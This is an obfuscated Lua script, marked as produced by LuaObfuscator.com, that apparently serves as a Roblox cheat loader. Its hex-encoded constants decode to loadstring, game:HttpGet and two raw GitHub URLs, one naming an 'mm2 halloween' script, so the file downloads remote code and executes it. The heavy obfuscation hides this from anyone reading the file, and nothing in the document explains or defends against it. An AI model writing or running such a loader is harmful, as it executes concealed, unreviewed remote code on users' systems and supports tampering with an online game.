

--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v89=0;while true do if (v89==0) then v19=v0(v3(v30,1,1));return "";end end else local v90=0;local v91;while true do if (v90==0) then v91=v2(v0(v30,16));if v19 then local v122=0;local v123;while true do if (v122==1) then return v123;end if (v122==0) then v123=v5(v91,v19);v19=nil;v122=1;end end else return v91;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v92=0 -0 ;local v93;while true do if (v92==((877 -(282 + 595)) -0)) then v93=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-1) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v93-(v93%(569 -(367 + 201))) ;end end else local v94=(929 -(214 + 713))^(v32-1) ;return (((v31%(v94 + v94))>=v94) and (1 + (1637 -(1523 + 114)))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=117 -(32 + 85) ;local v36;local v37;while true do if (v35==((351 -(87 + 263)) + 0)) then return (v37 * (57 + 199)) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + ((1452 -(67 + 113)) -(226 + 766 + 278)) ;v35=4 -3 ;end end end local function v23() local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;v38=3 -2 ;end if (v38==(953 -(802 + 150))) then return (v42 * (45169940 -28392724)) + (v41 * 65536) + (v40 * (464 -208)) + v39 ;end end end local function v24() local v43=0 + 0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(998 -(915 + 82))) then v46=2 -1 ;v47=(v20(v45,1 + 0 ,12 + 8 ) * ((2 -0)^(804 -(201 + 571)))) + v44 ;v43=1140 -(116 + (2811 -1789)) ;end if (v43==(1189 -((4192 -3123) + 118))) then v48=v20(v45,13 + 8 ,70 -39 );v49=((v20(v45,69 -37 )==(1 + 0)) and  -(1 -0)) or (1 + 0) ;v43=1 + 1 + 1 ;end if (v43==(791 -(368 + 423))) then v44=v23();v45=v23();v43=1 -0 ;end if (v43==(9 -6)) then if (v48==(18 -(10 + 8))) then if (v47==(0 -0)) then return v49 * ((348 + 94) -(416 + 26)) ;else v48=3 -2 ;v46=0 + 0 ;end elseif (v48==(7047 -5000)) then return ((v47==(1747 -(760 + (2042 -(87 + 968))))) and (v49 * ((1 -0)/(438 -(145 + 293))))) or (v49 * NaN) ;end return v8(v49,v48-(1453 -(44 + 386)) ) * (v46 + (v47/((1488 -((4393 -3395) + 488))^(17 + 1 + 34)))) ;end end end local function v25(v50) local v51=0 -0 ;local v52;local v53;while true do if (v51==(1415 -(447 + 966))) then v53={};for v113=2 -1 , #v52 do v53[v113]=v2(v1(v3(v52,v113,v113)));end v51=1820 -(1703 + 114) ;end if (v51==(701 -(376 + 325))) then v52=nil;if  not v50 then v50=v23();if (v50==0) then return "";end end v51=1 -0 ;end if (v51==3) then return v6(v53);end if (v51==((4 -2) -1)) then v52=v3(v16,v18,(v18 + v50) -((15 -(9 + 5)) + 0) );v18=v18 + v50 ;v51=2;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 0;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if (v104~=0) then else local v120=(function() return 0;end)();while true do if (v120==(286 -(134 + 151))) then v104=(function() return 1;end)();break;end if (v120==(1665 -(970 + 695))) then v95=(function() return 0 -0 ;end)();v96=(function() return nil;end)();v120=(function() return 1991 -(582 + 1408) ;end)();end end end if (v104==(3 -2)) then local v121=(function() return 0;end)();while true do if (v121~=0) then else local v124=(function() return 0 -0 ;end)();while true do if (v124==0) then while true do if (v95==(0 -0)) then v96=(function() return v97();end)();if (v98(v96, #":", #".")==(1824 -(1195 + 629))) then local v193=(function() return 0;end)();local v194=(function() return;end)();local v195=(function() return;end)();local v196=(function() return;end)();while true do if (v193~=1) then else local v197=(function() return 0;end)();while true do if (v197~=1) then else v193=(function() return 2;end)();break;end if (v197==0) then v196=(function() return {v99(),v99(),nil,nil};end)();if (v194==0) then local v202=(function() return 0;end)();local v203=(function() return;end)();while true do if (v202==(241 -(187 + 54))) then v203=(function() return 0;end)();while true do if (v203~=(780 -(162 + 618))) then else v196[ #"-19"]=(function() return v99();end)();v196[ #".com"]=(function() return v99();end)();break;end end break;end end elseif (v194== #"[") then v196[ #"xnx"]=(function() return v100();end)();elseif (v194==2) then v196[ #"gha"]=(function() return v100() -(2^(12 + 4)) ;end)();elseif (v194== #"gha") then local v208=(function() return 0 + 0 ;end)();local v209=(function() return;end)();while true do if (v208==0) then v209=(function() return 0 -0 ;end)();while true do if (v209~=0) then else v196[ #"xnx"]=(function() return v100() -((2 -0)^16) ;end)();v196[ #"0313"]=(function() return v99();end)();break;end end break;end end end v197=(function() return 1;end)();end end end if (v193==2) then if (v98(v195, #",", #".")~= #".") then else v196[1 + 1 ]=(function() return v101[v196[2]];end)();end if (v98(v195,1638 -(1373 + 263) ,1002 -(451 + 549) )== #":") then v196[ #"91("]=(function() return v101[v196[ #"nil"]];end)();end v193=(function() return 1 + 2 ;end)();end if ((4 -1)==v193) then if (v98(v195, #"-19", #"-19")~= #"\\") then else v196[ #"asd1"]=(function() return v101[v196[ #"0836"]];end)();end v102[v103]=(function() return v196;end)();break;end if (v193==(0 -0)) then v194=(function() return v98(v96,2, #"gha");end)();v195=(function() return v98(v96, #"http",1390 -(746 + 638) );end)();v193=(function() return 1;end)();end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end end end end end end end;end)();local v55=(function() return function(v105,v106,v107) local v108=(function() return 0 + 0 ;end)();local v109=(function() return;end)();while true do if (v108==(0 -0)) then v109=(function() return 0;end)();while true do if (0~=v109) then else local v125=(function() return 0;end)();while true do if ((341 -(218 + 123))==v125) then v105[v106-#"|" ]=(function() return v107();end)();return v105,v106,v107;end end end end break;end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v69= #"]",v60 do local v70=(function() return 0 + 0 ;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v70==(0 + 0)) then v71=(function() return v21();end)();v72=(function() return nil;end)();v70=(function() return 561 -(306 + 254) ;end)();end if ((1 + 0)==v70) then if (v71== #"[") then v72=(function() return v21()~=(0 -0) ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71~= #"nil") then else v72=(function() return v25();end)();end v61[v69]=(function() return v72;end)();break;end end end v59[ #"asd"]=(function() return v21();end)();for v73= #"{",v23() do FlatIdent_39764,Descriptor,v21,v20,v22,v23,v61,v56,v73=(function() return v54(FlatIdent_39764,Descriptor,v21,v20,v22,v23,v61,v56,v73);end)();end for v74= #"|",v23() do v57,v74,v28=(function() return v55(v57,v74,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[(4638 -3170) -(899 + 568) ];local v67=v63[1 + 1 + 0 ];local v68=v63[(1909 -(260 + 1638)) -(448 -(382 + 58)) ];return function(...) local v75=v66;local v76=v67;local v77=v68;local v78=v27;local v79=2 -1 ;local v80= -(604 -(268 + 335));local v81={};local v82={...};local v83=v12("#",...) -(2 -1) ;local v84={};local v85={};for v110=377 -(142 + 235) ,v83 do if (v110>=v77) then v81[v110-v77 ]=v82[v110 + (4 -3) ];else v85[v110]=v82[v110 + (291 -(60 + 230)) ];end end local v86=(v83-v77) + (573 -(426 + 146)) ;local v87;local v88;while true do v87=v75[v79];v88=v87[1 + (0 -0) ];if (v88<=(1460 -(282 + 976 + 198))) then if (v88<=(812 -(569 + (499 -257)))) then if (v88>(0 -0)) then do return;end else v85[v87[1 + 1 ]]();end elseif (v88<=((5 -3) + 0)) then v79=v87[(1207 -(902 + 303)) + (1 -0) ];elseif (v88>(2 + (2 -1))) then local v140=1024 -(706 + 318) ;local v141;local v142;while true do if (v140==(1251 -(721 + 530))) then v141=v87[1273 -(82 + 863 + 326) ];v142=v85[v87[(1697 -(1121 + 569)) -4 ]];v140=(215 -(22 + 192)) + 0 ;end if ((v140==(701 -(271 + 429))) or (2110<332)) then v85[v141 + 1 ]=v142;v85[v141]=v142[v87[4 + 0 ]];break;end end elseif ((3686>3172) and (v85[v87[1502 -(1408 + 92) ]]==v87[(1773 -(483 + 200)) -((1924 -(1404 + 59)) + (1710 -1085)) ])) then v79=v79 + (1289 -(993 + 295)) ;else v79=v87[1 + 2 ];end elseif ((v88<=(3 + 3)) or (4474<820)) then if ((4279>=2882) and (v88==((1580 -404) -(418 + 753)))) then local v127=0 + 0 ;local v128;local v129;local v130;local v131;while true do if ((v127==(1 + 0)) or (2029>=3521)) then v80=(v130 + v128) -((766 -(468 + 297)) + (562 -(334 + 228))) ;v131=0 + 0 ;v127=2 + 0 ;end if (v127==(529 -((1369 -963) + 123))) then v128=v87[2];v129,v130=v78(v85[v128](v13(v85,v128 + (1770 -(1749 + 20)) ,v87[1 + (4 -2) ])));v127=1323 -(1249 + 73) ;end if ((v127==(1 + 1)) or (2037>=4642)) then for v181=v128,v80 do v131=v131 + (1146 -(466 + 679)) ;v85[v181]=v129[v131];end break;end end else v85[v87[4 -2 ]]=v87[8 -5 ];end elseif (v88<=((3457 -1550) -(106 + 1794))) then local v134=0 + 0 ;local v135;local v136;local v137;local v138;local v139;while true do if (v134==(2 + 3)) then v79=v79 + 1 + 0 + 0 ;v87=v75[v79];v85[v87[5 -3 ]]();v79=v79 + (1581 -(1183 + 397)) ;v87=v75[v79];v134=16 -10 ;end if (v134==(120 -(4 + 110))) then v85[v87[2 + 0 ]]=v65[v87[(823 -(141 + 95)) -(57 + 527) ]];v79=v79 + (1428 -(41 + 1386)) ;v87=v75[v79];v85[v87[105 -(17 + 86) ]]=v65[v87[3 + 0 + 0 ]];v79=v79 + (1 -0) ;v134=20 -13 ;end if (v134==(1668 -(1477 + 184))) then v87=v75[v79];v139=v87[168 -(122 + 44) ];v138=v85[v87[3 -0 ]];v85[v139 + (1 -0) ]=v138;v85[v139]=v138[v87[4 + 0 ]];v134=8;end if ((1720<4458) and (v134==(0 -0))) then v135=nil;v136,v137=nil;v138=nil;v139=nil;v85[v87[2 + (0 -0) ]]=v65[v87[1 + 2 ]];v134=1 -0 ;end if (((68 -(30 + 35))==v134) or (436>3021)) then v87=v75[v79];v139=v87[2 + 0 ];v136,v137=v78(v85[v139](v13(v85,v139 + (477 -((98 -57) + 435)) ,v87[3 + 0 ])));v80=(v137 + v139) -(1258 -(1043 + 214)) ;v135=0;v134=15 -11 ;end if ((1213 -(323 + 209 + 680))==v134) then v79=v79 + (2 -1) ;v87=v75[v79];v139=v87[582 -((989 -628) + 219) ];v138=v85[v87[323 -(53 + 267) ]];v85[v139 + 1 + 0 ]=v138;v134=4 -2 ;end if (((292 + 123) -(15 + 398))==v134) then v85[v139]=v138[v87[986 -(18 + 964) ]];v79=v79 + (1876 -(157 + 1718)) ;v87=v75[v79];v85[v87[7 -5 ]]=v87[2 + 1 ];v79=v79 + (3 -2) ;v134=2 + 1 ;end if (4==v134) then for v184=v139,v80 do local v185=850 -(20 + 830) ;while true do if ((713<=847) and ((0 + 0)==v185)) then v135=v135 + 1 + 0 ;v85[v184]=v136[v135];break;end end end v79=v79 + (2 -1) ;v87=v75[v79];v139=v87[128 -((162 -46) + 10) ];v85[v139]=v85[v139](v13(v85,v139 + 1 + 0 ,v80));v134=743 -(542 + 196) ;end if (v134==(17 -9)) then v79=v79 + (1228 -(322 + 534 + 371)) ;v87=v75[v79];v85[v87[(776 -(92 + 71)) -(602 + 9) ]]=v87[1 + 0 + 2 ];break;end end elseif (v88==8) then v85[v87[1191 -(449 + 740) ]]=v65[v87[(2 -0) + 1 ]];else local v145=v87[1 + 1 ];v85[v145]=v85[v145](v13(v85,v145 + (2 -1) ,v80));end v79=v79 + (2 -(766 -(574 + 191))) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035D3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4974734A6944792F506572736F6E616C2D5363726970742F726566732F68656164732F6D61696E2F2Q6D3225323068612Q6C6F772Q656E2E6C7561035F3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F746F6269343337612F536372697074732F726566732F68656164732F6D61696E2F663Q3739303432343931653134306564303736393239342E6C756100143Q0012063Q00013Q0026033Q0001000100010004023Q00010001001208000100023Q001207000200033Q00202Q00020002000400122Q000400056Q000200046Q00013Q00024Q00010001000100122Q000100023Q00122Q000200033Q00202Q00020002000400122Q000400064Q0005000200044Q000900013Q00024Q0001000100010004023Q001300010004023Q000100012Q00013Q00017Q00",v9(),...);
